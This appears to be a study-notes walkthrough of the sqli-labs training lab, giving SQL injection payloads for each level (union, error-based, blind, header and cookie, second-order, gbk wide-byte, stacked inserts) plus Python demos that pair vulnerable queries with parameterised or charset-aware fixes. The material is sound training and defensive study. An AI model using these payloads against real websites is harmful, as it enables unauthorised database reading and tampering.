I have been doing web security for about half a year now, so it is time to publish some of the notes I made along the way.
Remember to read the source code of each level: some levels can be passed in more than one way, so don't let other people's answers box you in.
sql-labs1:
?id=-2' union select 1,database(),3--+
sql-labs2:
?id=-2 union select 1,database(),3
sql-labs3:
?id=-2') union select 1,database(),3 --+
sql-labs4:
?id=2" and extractvalue(1,concat(0x7e,(database()))) and "1"="1
sql-labs5:
?id=2' and extractvalue(1,concat(0x7e,(database())))--+
sql-labs6:
?id=2" and extractvalue(1,concat(0x7e,(database())))--+
sql-labs7:
?id=2')) and extractvalue(1,concat(0x7e,(database())))--+
Less-7 only prints a fixed "You have an error in your SQL syntax" string (mysql_error() is commented out in the source), so this payload only confirms the (('...')) closing; to read anything out, put a boolean or time-based condition in the same position, or use the outfile route the level hints at.
sql-labs8:
?id=2' and length(database())>1--+
sql-labs9:
?id=2' and if(length(database())>1,sleep(2),1)--+
sql-labs10:
?id=2" and if(length(database())>1,sleep(2),1)--+
sql-labs11: POST form; intercept the login request and inject into the uname field
uname=admin' and extractvalue(1,concat(0x7e,(database())))--+
sql-labs12:
uname=admin") and extractvalue(1,concat(0x7e,(database())))--+
sql-labs13:
uname=admin') and extractvalue(1,concat(0x7e,(database())))--+
sql-labs14:
uname=admin" and extractvalue(1,concat(0x7e,(database())))--+
sql-labs15:
uname=admin' and if(length(database())>1,sleep(2),1)--+
sql-labs16:
uname=admin") and if(length(database())>1,sleep(2),1)--+
sql-labs17:
uname=admin&passwd=admin' and extractvalue(1,concat(0x7e,(database())))--+
sql-labs18:
User-Agent: .....Firefox/73.0' and extractvalue(1,concat(0x7e,(database()))) and '1'='1
sql-labs19:
Referer: ..../Less-19/' and extractvalue(1,concat(0x7e,(database()))) and '1'='1
sql-labs20:
Cookie: uname=admin' and extractvalue(1,concat(0x7e,(database())))--+;
sql-labs21:
Cookie: uname=YWRtaW43JyBhbmQgZXh0cmFjdHZhbHVlKDEsY29uY2F0KDB4N2UsKGRhdGFiYXNlKCkpKSkgYW5kICcxJz0nMQ==;
(base64 of: admin7' and extractvalue(1,concat(0x7e,(database()))) and '1'='1 ; the cookie is base64-decoded and dropped into username=('...'))
sql-labs22:
Cookie: uname=YWRtaW43ACIgYW5kIGV4dHJhY3R2YWx1ZSgxLGNvbmNhdCgweDdlLChkYXRhYmFzZSgpKSkpIGFuZCAiMSI9IjE=;
(base64 of: admin7" and extractvalue(1,concat(0x7e,(database()))) and "1"="1 ; note that this particular encoding carries a stray NUL byte (\x00) right after admin7, an encoding slip, so drop it when you re-encode)
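Added example, not from the notes or the lab: a helper to build the base64 uname cookie for Less-21/Less-22 and to sanity-check a cookie before sending it. Decoding the two cookies above with it is how the stray NUL in the Less-22 one shows up.

```python
import base64
from typing import List, Tuple

# The two cookies from the Less-21 / Less-22 notes above.
LESS21_COOKIE = "YWRtaW43JyBhbmQgZXh0cmFjdHZhbHVlKDEsY29uY2F0KDB4N2UsKGRhdGFiYXNlKCkpKSkgYW5kICcxJz0nMQ=="
LESS22_COOKIE = "YWRtaW43ACIgYW5kIGV4dHJhY3R2YWx1ZSgxLGNvbmNhdCgweDdlLChkYXRhYmFzZSgpKSkpIGFuZCAiMSI9IjE="


def cookie_for(payload: str) -> str:
    """Encodes a raw payload the way Less-21/22 expect it in the uname cookie."""
    return base64.b64encode(payload.encode("utf-8")).decode("ascii")


def decode_cookie(cookie: str) -> Tuple[str, List[int]]:
    """Decodes a uname cookie and returns the text plus the offsets of any control
    bytes; those are almost always a slip in the encoding, not part of the payload."""
    raw = base64.b64decode(cookie)
    stray = [i for i, b in enumerate(raw) if b < 0x20 or b == 0x7F]
    return raw.decode("latin-1"), stray


def cookie_header(payload: str) -> str:
    """Full header line to paste into the intercepted request."""
    return f"Cookie: uname={cookie_for(payload)};"


if __name__ == "__main__":
    for c in (LESS21_COOKIE, LESS22_COOKIE):
        text, stray = decode_cookie(c)
        print(repr(text), "control bytes at offsets", stray)
    # A clean Less-22 cookie, built from the intended payload:
    print(cookie_header('admin7" and extractvalue(1,concat(0x7e,(database()))) and "1"="1'))
```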
sql-labs23:
?id=2' and extractvalue(1,concat(0x7e,(database()))) and '1'='1
sql-labs24: second-order injection
First look in phpmyadmin to see which users exist, then register a user named admin1'# with any password. The ' is escaped on the way in, but what lands in the table is the plain name admin1'#.
Then change the password of admin1'#. The UPDATE statement picks admin1'# back up as the current user; because that value came from the database, the programmer treats it as safe and does not escape it again. The # comments out everything after the closing quote, so only username='admin1' is left in the WHERE clause, and what actually gets changed is admin1's password.
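Added example, not from the notes or the lab code: the Less-24 flow replayed against an in-memory SQLite table, with the vulnerable password change beside a parameterised one. SQLite has no # comment and no backslash escapes, so the registered name here is admin1'-- and the escaper doubles the quote instead of backslashing it; the mechanism is otherwise the same.

```python
import sqlite3


def setup() -> sqlite3.Connection:
    """Constructed stand-in for the lab's users table (in-memory SQLite)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    db.executemany("INSERT INTO users (username, password) VALUES (?, ?)",
                   [("admin", "admin-pass"), ("admin1", "admin1-pass")])
    return db


def sql_escape(value: str) -> str:
    """Stand-in for mysql_real_escape_string(): keeps a quote from closing the literal.
    SQLite only knows the doubled quote, MySQL would write \\' ; the stored value is
    identical either way."""
    return value.replace("'", "''")


def register(db: sqlite3.Connection, username: str, password: str) -> None:
    # First order: the input is escaped, so this INSERT is safe and the raw name
    # (quote, comment marker and all) is stored verbatim.
    db.execute("INSERT INTO users (username, password) VALUES "
               f"('{sql_escape(username)}', '{sql_escape(password)}')")


def change_password_vulnerable(db: sqlite3.Connection, session_user: str, old: str, new: str) -> None:
    # Second order: the username now comes from the application's own stored copy,
    # the code trusts it and concatenates it unescaped. With session_user = "admin1'-- "
    # the statement becomes
    #   UPDATE users SET password='pwned' WHERE username='admin1'-- ' AND password='x'
    # so the password check is commented out and admin1's row is the one updated.
    db.execute(f"UPDATE users SET password='{sql_escape(new)}' "
               f"WHERE username='{session_user}' AND password='{sql_escape(old)}'")


def change_password_fixed(db: sqlite3.Connection, session_user: str, old: str, new: str) -> None:
    # Parameter binding treats the stored name as data, wherever it came from.
    db.execute("UPDATE users SET password=? WHERE username=? AND password=?",
               (new, session_user, old))


def password_of(db: sqlite3.Connection, username: str) -> str:
    return db.execute("SELECT password FROM users WHERE username=?", (username,)).fetchone()[0]


def run(fixed: bool) -> str:
    """Registers the attacker account, changes 'its' password, returns admin1's password."""
    db = setup()
    attacker = "admin1'-- "      # the notes' admin1'# ; SQLite only has the -- comment
    register(db, attacker, "x")
    change = change_password_fixed if fixed else change_password_vulnerable
    change(db, attacker, "x", "pwned")
    return password_of(db, "admin1")


if __name__ == "__main__":
    print("vulnerable:", run(False))   # pwned
    print("fixed:     ", run(True))    # admin1-pass
```

The point the example makes is that escaping is a property of one statement, not of the data: the value survives the first, escaped statement intact and is dangerous again the moment it is concatenated into a second one.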
sql-labs25:
?id=-2%27 anandd extractvalue(1,concat(0x7e,(database())))--+
sql-labs26:
?id=-1%27||extractvalue(1,concat(0x7e,(select(group_concat(table_name))from(infoorrmation_schema.tables)where(table_schema=database()))))||%271%27=%271
sql-labs26a:
?id=0%27||(select(count(table_name))from(infoorrmation_schema.tables)where(table_schema=database()))>1||%271%27=%272
Levels like this one, where spaces are not allowed, are worth working out on your own instead of reading someone else's answer; after a few attempts it becomes second nature.
sql-labs27:
?id=0%27||extractvalue(1,concat(0x7e,(sEleCt(group_concat(table_name))from(information_schema.tables)where(table_schema=database()))))||%271%27=%272
sql-labs27a:
?id=0"||(selselselectectect(count(table_name))from(information_schema.tables)where(table_schema=database()))=4||"1"="2
sql-labs28:
?id=2%27)||(select(count(table_name))from(information_schema.tables)where(table_schema=database()))=4||(%271%27=%272
sql-labs28a:
?id=2%27 and (SeLect count(table_name) from information_schema.tables where table_schema=database())>1 and %271%27=%271
sql-labs29:
?id=-2%27 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()--+
sql-labs30:
?id=-2" union select 1,2,database()--+
sql-labs31:
?id=-2") union select 1,database(),3 and ("1"="2
sql-labs32: wide-byte injection. addslashes() puts a backslash (0x5c) in front of the quote, but the connection is set to gbk, so %df followed by 0x5c is read as one double-byte character and the quote comes through unescaped.
?id=-2%df%27%20union%20select%201,database(),3--+
sql-labs33:
?id=-2%df%27%20union%20select%201,2,group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=database()--+
sql-labs34:
uname=admin%df' and extractvalue(1,concat(0x7e,(database())))--+
sql-labs35:
?id=-2 union select 1,2,database()
sql-labs36: bypass mysql_real_escape_string (same gbk trick: the escaper works byte by byte and does not know the connection charset)
?id=-2%df%27%20union%20select%201,2,database()--+
sql-labs37:
password=123456%df' and extractvalue(1,concat(0x7e,(database())))#
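Less-32 to Less-37 all turn on the same thing: escaping done byte by byte while the server reads the query as gbk. The Python below is an added example, not from the notes: it shows what the server ends up parsing for the %df%27 prefix under latin1 versus gbk, and the charset-aware escaping that closes the hole. escape_bytes() is a simplified stand-in for addslashes()/mysql_real_escape_string(), and the injected id is constructed input.

```python
import re


def escape_bytes(raw: bytes) -> bytes:
    """Byte-oriented stand-in for addslashes() / mysql_real_escape_string() on a
    connection whose charset the escaper does not know: a backslash goes in front
    of every ' " \\ and NUL, one byte at a time, multi-byte characters be damned."""
    out = bytearray()
    for b in raw:
        if b in b"'\"\\\x00":
            out.append(0x5C)
        out.append(b)
    return bytes(out)


def query_as_mysql_sees_it(raw_id: bytes, connection_charset: str) -> str:
    """Builds Less-32's query around the escaped id and decodes it with the
    connection charset, which is how the server's parser will read it."""
    sql = b"SELECT * FROM users WHERE id='" + escape_bytes(raw_id) + b"' LIMIT 0,1"
    return sql.decode(connection_charset, errors="replace")


def escape_charset_aware(raw_id: bytes, connection_charset: str) -> str:
    """The fix: decode with the connection charset first, then escape per character
    (what mysqli_set_charset('gbk') followed by mysqli_real_escape_string() does).
    0xdf on its own is not a valid gbk character, so it becomes U+FFFD and the
    quote behind it is escaped like any other."""
    text = raw_id.decode(connection_charset, errors="replace")
    return re.sub(r"(['\"\\\x00])", r"\\\1", text)


def query_fixed(raw_id: bytes, connection_charset: str) -> str:
    return ("SELECT * FROM users WHERE id='"
            + escape_charset_aware(raw_id, connection_charset) + "' LIMIT 0,1")


def unescaped_quotes(sql: str) -> int:
    """Counts single quotes not preceded by a backslash; a clean query has exactly 2."""
    return len(re.findall(r"(?<!\\)'", sql))


# %df%27 from the Less-32 payload, followed by the rest of the injection (constructed input).
WIDE_BYTE_ID = b"\xdf' union select 1,database(),3-- "

if __name__ == "__main__":
    for cs in ("latin1", "gbk"):
        q = query_as_mysql_sees_it(WIDE_BYTE_ID, cs)
        print(f"{cs:6} unescaped quotes={unescaped_quotes(q)}  {q}")
    print(f"fixed  unescaped quotes={unescaped_quotes(query_fixed(WIDE_BYTE_ID, 'gbk'))}")
```

Under latin1 the backslash survives and the query still has its two delimiting quotes; under gbk the 0xdf 0x5c pair collapses into one CJK character, a third, live quote appears, and the union select is parsed as SQL.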
sql-labs38: stacked queries; the function to look at in the source is mysqli_more_results() (the query goes through mysqli_multi_query(), so a second statement after ; is executed as well)
?id=-2%27 union select 1,2,database()--+
sql-labs39:
?id=-2 union select 1,2,database()--+
sql-labs40:
?id=2%27 and length(database())=8 and %271%27=%271
sql-labs41:
?id=-2 union select 1,2,database()
sql-labs42: stacked queries, or plain error-based (the password field is not escaped)
password=123'+and+extractvalue(1,concat(0x7e,(database())))+and+'1'='1
';insert into users values(99,'dawn','dawn')#
sql-labs43:
password=123'+and+extractvalue(1,concat(0x7e,(database())))+and+'1'='1
sql-labs44:
password=123456'+and+(length(database())>1)+and+'1'='1
sql-labs45:
password=123456'+and+(length(database())>1)+and+'1'='1
sql-labs46:
?sort=rand(length(database())=8)
?sort=extractvalue(1,concat(0x7e,(database())))
?sort=if(length(database())>10,sleep(3),1)
sql-labs47:
?sort=-1' and extractvalue(1,concat(0x7e,(database())))--+
sql-labs48:
?sort=rand(length(database())>3)
sql-labs49:
?sort=1%27%20and%20if(length(database())%3E7,sleep(3),1)--+
sql-labs50:
?sort=1 and extractvalue(1,concat(0x7e,(database())))
?sort=rand(length(database())>1)
sql-labs51:
?sort=1' and extractvalue(1,concat(0x7e,database()))--+
?sort=1' and if((length(database())>1),sleep(3),1)--+
sql-labs52:
?sort=2 and if((length(database())>1),sleep(2),1)
sql-labs53:
?sort=1' and if((length(database())>1),sleep(2),1)--+
sql-labs54:
From this level on the main difference is that the number of attempts is limited, and table names, column names and values are randomised per instance (the secret_1M0Y / rj17gc4jhw names in Less-56 below are from my run; yours will differ).
?id=-2' union select 1,2,database()--+
sql-labs55:
?id=-2) union select 1,2,database()--+
sql-labs56:
?id=-2') union select 1,2,secret_1M0Y from rj17gc4jhw--+
sql-labs57:
?id=-2" union select 1,2,database()--+
sql-labs58:
?id=-2' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() and '1'='1
sql-labs59:
?id=-2 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()--+
sql-labs60:
?id=-2") union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() and ("1"="1
sql-labs61:
?id=-2')) and extractvalue(1,concat(0x7e,(database()))) and (('1'='1
sql-labs62:
?id=2' and (length(database())>1) and '1'='1
sql-labs63:
?id=2' and (length(database())>1) and '1'='1
sql-labs64:
?id=2" and (length(database())>1) and "1"="1
sql-labs65:
?id=2" and (length(database())>1) and "1"="1